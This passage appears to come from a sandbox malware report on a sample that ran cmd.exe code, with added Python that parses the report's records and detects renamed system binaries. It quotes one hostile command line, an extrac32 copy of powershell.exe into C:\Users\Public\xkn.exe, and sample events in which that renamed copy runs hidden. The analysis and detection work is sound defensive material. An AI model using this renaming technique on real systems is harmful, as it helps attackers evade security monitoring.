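def decode_dump_name(name: str) -> DumpRegion:
    """Split '<pid>.<run>.<id>.<base>.<protect>.<x>.<type>.<y>.sdmp' (assumed layout)."""
    parts = name.strip().removesuffix(".sdmp").split(".")
    if len(parts) != 8:
        raise ValueError(f"unexpected dump name: {name}")
    return DumpRegion(name.strip(), int(parts[0], 16), int(parts[1], 16), int(parts[3], 16),
                      PAGE_PROTECT.get(int(parts[4], 16), parts[4]),
                      MEM_TYPE.get(int(parts[6], 16), parts[6]))

@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    source: DumpRegion | None = None
    offset: int | None = None
    based_on_pe: bool | None = None
    associated: list[DumpRegion] = field(default_factory=list)
    snapshot: str | None = None
    similarity: dict[str, str] = field(default_factory=dict)
    uniqueness: str | None = None

    @property
    def strings(self) -> list[str]:
        """The report joins a function's referenced strings with '$'."""
        raw = self.similarity.get("String ID", "")
        return raw.split("$") if raw else []

    @property
    def instruction_fuzzy_hash(self) -> str | None:
        return self.similarity.get("Instruction Fuzzy Hash")

def parse_records(text: str) -> list[FunctionRecord]:
    records, rec, heading = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADINGS:
            heading = line
            continue
        if line.startswith("Uniqueness Score:"):       # closes one record
            rec.uniqueness = line.split(":", 1)[1].strip()
            records.append(rec)
            rec, heading = FunctionRecord(), None
            continue
        item = line[1:].strip() if line.startswith("•") else line
        if heading == "APIs":
            m = API_RE.match(item)
            if m:
                args = [a for a in (m["args"] or "").split(",") if a]
                rec.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16)))
        elif heading == "Memory Dump Source":
            if item.startswith("Source File:"):
                fields = dict(f.split(": ", 1) for f in item.split(", "))
                rec.source = decode_dump_name(fields["Source File"])
                rec.offset = int(fields["Offset"], 16)
                rec.based_on_pe = fields["based on PE"].lower() == "true"
            elif item.startswith("Associated:"):
                # Raw report text carries a trailing "Download File" link label.
                name = item.split(":", 1)[1].strip().removesuffix("Download File")
                rec.associated.append(decode_dump_name(name))
        elif heading == "Joe Sandbox IDA Plugin" and item.startswith("Snapshot File:"):
            rec.snapshot = item.split(":", 1)[1].strip()
        elif heading == "Similarity":
            key, _, value = item.partition(":")
            rec.similarity[key.strip()] = value.strip()
    return records

def index_by_similarity(records: list[FunctionRecord], key: str = "Opcode ID") -> dict[str, list[FunctionRecord]]:
    """Group records by one Similarity field so hits can be matched across reports."""
    idx: dict[str, list[FunctionRecord]] = {}
    for r in records:
        if v := r.similarity.get(key):
            idx.setdefault(v, []).append(r)
    return idx

# Constructed sample in the report's layout (values taken from records on this page).
SAMPLE = """\
APIs
• _wcsnicmp.MSVCRT ref: 00007FF789BE8239
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?), ref: 00007FF789BE83AE
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Heap$Console_wcsnicmp$LockProcessShared$Free
• String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
• API String ID: 3637805771-3100821235
• Opcode ID: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
• Instruction Fuzzy Hash: 56E16C31A08A5A8AE710AF65A40417DFEB5FB49F96BE58234DD1E53790EF3CE444C720
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: wcsrchr$towlower
• String ID: fdpnxsatz
• Opcode ID: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
• Instruction Fuzzy Hash: 4F42B321B0968A86EB68AF2595182B9BFB1FF45F96FA44135DE4E07B84DF3CE441C310
Uniqueness
Uniqueness Score: -1.00%
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.source.protect, hex(rec.source.base), rec.strings, rec.similarity.get("Opcode ID"))
```

Feed it the text of a whole report and index by "Instruction Fuzzy Hash" or "Opcode ID" to spot the same function (here, code belonging to the command interpreter the sample copied) turning up in other analyses.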
APIs
• _wcsupr.MSVCRT ref: 00007FF789BEEF33
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEEF98
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEEFA9
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEEFBF
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF789BEEFDC
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEEFED
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF003
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF022
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF083
• FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF092
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF0A5
• towupper.MSVCRT ref: 00007FF789BEF0DB
• wcschr.MSVCRT ref: 00007FF789BEF135
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF16C
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF185
  • Part of subcall function 00007FF789BD01B8: _get_osfhandle.MSVCRT ref: 00007FF789BD01C4
  • Part of subcall function 00007FF789BD01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF789BDE904,?,?,?,?,00000000,00007FF789BD3491,?,?,?,00007FF789BE4420), ref: 00007FF789BD01D6
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
• String ID: <noalias>$CMD.EXE
• API String ID: 1161012917-1690691951
• Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
• Instruction ID: 522d4477c7e668436f625e1f33634c0789cca3cf7043065c4db2181d243407ee
• Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
• Instruction Fuzzy Hash: D9919E21B0965A8AFB14AF60E8101BDAEB4BF49F96FA48135DD0E52695EF3CE445C320
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FF789BD3578: _get_osfhandle.MSVCRT ref: 00007FF789BD3584
  • Part of subcall function 00007FF789BD3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD359C
  • Part of subcall function 00007FF789BD3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35C3
  • Part of subcall function 00007FF789BD3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35D9
  • Part of subcall function 00007FF789BD3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35ED
  • Part of subcall function 00007FF789BD3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD3602
• _get_osfhandle.MSVCRT ref: 00007FF789BC32F3
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF789BC32A4), ref: 00007FF789BC3309
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF789BC3384
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF789BE11DF
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
• String ID:
• API String ID: 611521582-0
• Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
• Instruction ID: 011e5cb493d8f09fa99c0f6b33819a0f1d203141f79872e10c3efddf03b11205
• Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
• Instruction Fuzzy Hash: 2CA19022B0861686EB14AF61E8542BDFAB1FB89F9AFE44135CD0E47784EF3CD445C620
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
• String ID: \\?\
• API String ID: 628682198-4282027825
• Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
• Instruction ID: db5213d4475f3a3cecd8c591053223bdf4b32c7ca516baa785ed74cafd053f77
• Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
• Instruction Fuzzy Hash: FBE1B222B0868A96EF64AF20D8442F9ABB0FB45F5AFA05135DA0E477D4EF3CE545C310
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
• String ID:
• API String ID: 16309207-0
• Opcode ID: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
• Instruction ID: 6720803b7b0e68671e10d1e1bd9313ed28fd71cf9afd3815a3c1a22e8f68ad7f
• Opcode Fuzzy Hash: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
• Instruction Fuzzy Hash: 2822C222704B8A86EB24AF21D8542FDABB4FF85B86FA04135DA0E47B95DF3CE145C310
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
• String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
• API String ID: 3863671652-3077789980
• Opcode ID: 3640a331ccc2cc57322506a3803c6ed823bdadfa8ecf7f5cc83c189721e7befd
• Instruction ID: d710025a6ff9975953b7bfcff9fd1356fb7ae6e7ee5b7dcbc4b2ce0f601362f0
• Opcode Fuzzy Hash: 3640a331ccc2cc57322506a3803c6ed823bdadfa8ecf7f5cc83c189721e7befd
• Instruction Fuzzy Hash: 69E1AE25A0928A82FA60BF25D858379EAB0BF85FA6FF54435D90D027D1DF3CE845C720
Uniqueness
Uniqueness Score: -1.00%
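The command line recovered from cmd.exe memory in the entry above, extrac32 /C /Y copying powershell.exe into C:\Users\Public\xkn.exe, is the step behind the report's "Powershell is started from unusual location" and "Drops or copies ... with a different name" verdicts: extrac32 is a signed Windows binary that will copy any file, and the copy keeps the PE version resource (OriginalFileName) of the original. The Python below is an added detection example, not part of the Joe Sandbox report, and runs over constructed Sysmon-style process-creation events (Image, CommandLine, OriginalFileName field names as Sysmon logs them). It flags both halves: the LOLBin copy of a System32 binary into a user-writable directory, and a later process whose OriginalFileName is powershell.exe, cmd.exe or certutil.exe while its file name or location differs. The event contents and the list of watched directories are assumptions made for the demonstration.

```python
"""Detect extrac32-based copies of system binaries and the renamed copies
running afterwards, over Sysmon-style process creation events."""
import ntpath
import shlex

# Directories a standard user can write to (assumption: extend per estate).
USER_WRITABLE_PREFIXES = (
    r"c:\users\public",
    r"c:\programdata",
    r"c:\windows\temp",
    r"\appdata\local\temp",   # substring match, any user profile
)
# PE OriginalFileName values (lower-cased) of the binaries this report shows
# being copied under other names.
WATCHED_ORIGINAL_NAMES = {"powershell.exe", "cmd.exe", "certutil.exe"}
SYSTEM_DIR_PREFIXES = (r"c:\windows\system32", r"c:\windows\syswow64")


def split_cmdline(cmdline):
    """Windows-style split: backslashes are literal, surrounding quotes dropped."""
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]


def in_user_writable(path):
    p = path.lower()
    return any(p.startswith(x) or (x.startswith("\\") and x in p)
               for x in USER_WRITABLE_PREFIXES)


def detect_lolbin_copy(event):
    """extrac32 /C <system binary> <user-writable destination>."""
    if ntpath.basename(event["Image"]).lower() != "extrac32.exe":
        return None
    argv = split_cmdline(event["CommandLine"])
    flags = [a.lower() for a in argv[1:] if a.startswith("/")]
    paths = [a for a in argv[1:] if not a.startswith("/")]
    if "/c" not in flags or len(paths) < 2:
        return None          # cabinet extraction, not a file copy
    src, dst = paths[0], paths[1]
    if src.lower().startswith(SYSTEM_DIR_PREFIXES) and in_user_writable(dst):
        return f"extrac32 copy of {ntpath.basename(src)} to {dst}"
    return None


def detect_renamed_system_binary(event):
    """A watched binary running under another file name or from a
    user-writable directory; OriginalFileName survives a plain file copy."""
    original = event.get("OriginalFileName", "").lower()
    if original not in WATCHED_ORIGINAL_NAMES:
        return None
    image = event["Image"]
    renamed = ntpath.basename(image).lower() != original
    if renamed or in_user_writable(image):
        return f"{original} running as {image}"
    return None


def scan(events):
    """Return (rule name, message) for every event a rule fires on."""
    hits = []
    for ev in events:
        for rule in (detect_lolbin_copy, detect_renamed_system_binary):
            msg = rule(ev)
            if msg:
                hits.append((rule.__name__, msg))
    return hits


# Constructed events for the demonstration; the first CommandLine is the
# string the report recovered, the other three are made up (two benign).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\extrac32.exe",
     "CommandLine": r"extrac32 /C /Y C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\xkn.exe",
     "OriginalFileName": "extrac32.exe"},
    {"Image": r"C:\Users\Public\xkn.exe",
     "CommandLine": r"C:\Users\Public\xkn.exe -w hidden",
     "OriginalFileName": "PowerShell.EXE"},
    {"Image": r"C:\Windows\System32\extrac32.exe",
     "CommandLine": r"extrac32 /Y C:\Users\alice\Downloads\driver.cab C:\Users\alice\AppData\Local\Temp",
     "OriginalFileName": "extrac32.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -File "C:\Scripts\backup.ps1"',
     "OriginalFileName": "PowerShell.EXE"},
]

if __name__ == "__main__":
    for name, msg in scan(SAMPLE_EVENTS):
        print(f"[{name}] {msg}")
```

The second rule is the durable one: an attacker can pick any destination name, but cannot change the version resource without re-signing or patching the file, so OriginalFileName mismatches catch renamed cmd.exe, certutil.exe and powershell.exe copies regardless of how they were copied. Running the block flags only the two malicious events and stays silent on the benign cabinet extraction and the normal powershell.exe launch.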

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
• String ID: $Application$System
• API String ID: 3538039442-1881496484
• Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
• Instruction ID: b09bdabf5000ee21caf924bf3d8a787722f9fda8758c6977b349684a1de16b3c
• Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
• Instruction Fuzzy Hash: 5951AB32A08B4596EA20AF15B41067AFBB5FB89F96FA49138DE4E03754EF3CD445C710
Uniqueness
Uniqueness Score: -1.00%

APIs
• longjmp.MSVCRT(?,?,00000000,00007FF789BE048E), ref: 00007FF789BEDA58
• memset.MSVCRT ref: 00007FF789BEDAD6
• memset.MSVCRT ref: 00007FF789BEDAFC
• memset.MSVCRT ref: 00007FF789BEDB22
  • Part of subcall function 00007FF789BD3A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF789BEEAC5,?,?,?,00007FF789BEE925,?,?,?,?,00007FF789BCB9B1), ref: 00007FF789BD3A56
  • Part of subcall function 00007FF789BC5194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF789BC51C4
  • Part of subcall function 00007FF789BD823C: FindFirstFileExW.KERNELBASE ref: 00007FF789BD8280
  • Part of subcall function 00007FF789BD823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF789BD829D
  • Part of subcall function 00007FF789BD01B8: _get_osfhandle.MSVCRT ref: 00007FF789BD01C4
  • Part of subcall function 00007FF789BD01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF789BDE904,?,?,?,?,00000000,00007FF789BD3491,?,?,?,00007FF789BE4420), ref: 00007FF789BD01D6
  • Part of subcall function 00007FF789BC4FE8: _get_osfhandle.MSVCRT ref: 00007FF789BC5012
  • Part of subcall function 00007FF789BC4FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BC5030
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BEDDB0
  • Part of subcall function 00007FF789BC59E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BC5A2E
  • Part of subcall function 00007FF789BC59E4: _open_osfhandle.MSVCRT ref: 00007FF789BC5A4F
• _get_osfhandle.MSVCRT ref: 00007FF789BEDDEB
• SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BEDDFA
• ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF789BEE204
• ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF789BEE223
• ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF789BEE242
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
• String ID: %9d$%s$~
• API String ID: 3651208239-912394897
• Opcode ID: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
• Instruction ID: 1b6fd5ec4e57d7f26f5b95cbd416afdf9820befb785c6e867baf2d23cd15c9e3
• Opcode Fuzzy Hash: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
• Instruction Fuzzy Hash: ED429331A086CA86EB64BF21D8541FDBBB4FB85B4AFA00135E64D47A99DF3DE540C720
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
• String ID: COPYCMD$\
• API String ID: 3989487059-1802776761
• Opcode ID: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
• Instruction ID: 6b6dd3ec5bf9776edeffa21c65dc91d4f24febc0c677b7cbe7f83786abaa64d4
• Opcode Fuzzy Hash: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
• Instruction Fuzzy Hash: B7F1C165B0878E82EA64BF15D4042BEABB4FF45F9AFA48035DA4E47794EE3CE045C310
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Time$File$System$FormatInfoLocalLocale
• String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
• API String ID: 55602301-2548490036
• Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
• Instruction ID: d3f7be1a393bc9cf72f9f1d153652a94ed7f9ba5d3e75fa309e7cc863788626a
